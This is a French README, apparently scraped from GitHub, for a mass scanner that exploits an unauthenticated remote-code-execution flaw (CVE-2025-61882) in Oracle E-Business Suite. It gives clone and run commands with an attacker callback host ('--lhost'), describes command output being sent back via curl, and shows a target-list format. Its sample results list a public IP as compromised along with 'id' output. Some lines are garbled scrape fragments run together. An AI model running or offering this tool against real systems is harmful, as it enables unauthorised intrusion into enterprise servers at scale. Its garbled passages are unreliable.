
Scanner multi-threadé pour CVE-2025-61882 dans Oracle E-Business Suite, exploitant le détournement de requêtes HTTP pour parvenir à une exécution de code à distance non authentifiée et valider via la sortie de commande.
Un scanner de masse rapide et multi-thread pour détecter la CVE-2025-61882 dans les installations Oracle E-Business Suite. Cette vulnérabilité critique permet une exécution de code à distance non authentifiée.
id et en analysant la sortievuln-output.txt immédiatementpip install requests
C'est tout. Juste Python 3.7+ et la bibliothèque requests.
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt
python3 cve-2025-61882.py --targets targets.txt --lhost VOTRE_IP_VPS
python3 cve-2025-61882.py --targets targets.txt --lhost VOTRE_IP_VPS --threads 50
python3 cve-2025-61882.py --targets targets.txt --lhost VOTRE_IP_VPS --threads 10
Créez un fichier targets.txt avec une URL par ligne :
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com
╔═══════════════════════════════════════════════════════════════╗
║ Scanner RCE pour Oracle E-Business Suite (CVE-2025-61882) ║
╚═══════════════════════════════════════════════════════════════╝
[*] 1235 cibles chargées depuis le fichier
[*] Exécution avec 20 threads concurrents
[*] Les hôtes vulnérables seront enregistrés dans vuln-output.txt
[*] [1/1235] Vérification de https://target1.com:443 sur le port 7893
[*] [2/1235] Vérification de https://target2.com:443 sur le port 5882
[+] Trouvé ! 129.146.56.43 est vulnérable
[+] Sortie de la commande : uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
=================================================================
[*] Analyse terminée en 245.67 secondes
[*] 3 cible(s) vulnérable(s) trouvée(s)
[*] Consultez vuln-output.txt pour les résultats complets
=================================================================
[+] Cibles vulnérables trouvées :
129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
10.0.0.100 → uid=500(oracle) gid=500(oinstall)
Les résultats sont enregistrés dans vuln-output.txt :
# Oracle EBS CVE-2025-61882 - Résultats de l'analyse
# Début : Tue Oct 07 15:30:45 2025
# Total des cibles : 1235
# Scanner par : Chirag Artani
129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)
id et renvoie la sortie via curluid=...gid=...Cet outil est destiné uniquement aux tests de sécurité autorisés. Toujours :
L'accès non autorisé aux systèmes informatiques est illégal.
Vous avez trouvé un bug ? Vous avez une demande de fonctionnalité ?
git checkout -b feature/amazing-feature)git commit -m 'Add some feature')git push origin feature/amazing-feature)Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.
Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil. Utilisez-le à vos propres risques.
Fait avec ❤️ pour la communauté infosec
| Argument | Requis | Défaut | Description |
|---|
--targets | Oui | - | Chemin vers le fichier contenant les URL cibles |
--lhost | Oui | - | Votre adresse IP VPS/attaquant |
--threads | Non | 20 | Nombre de threads concurrents |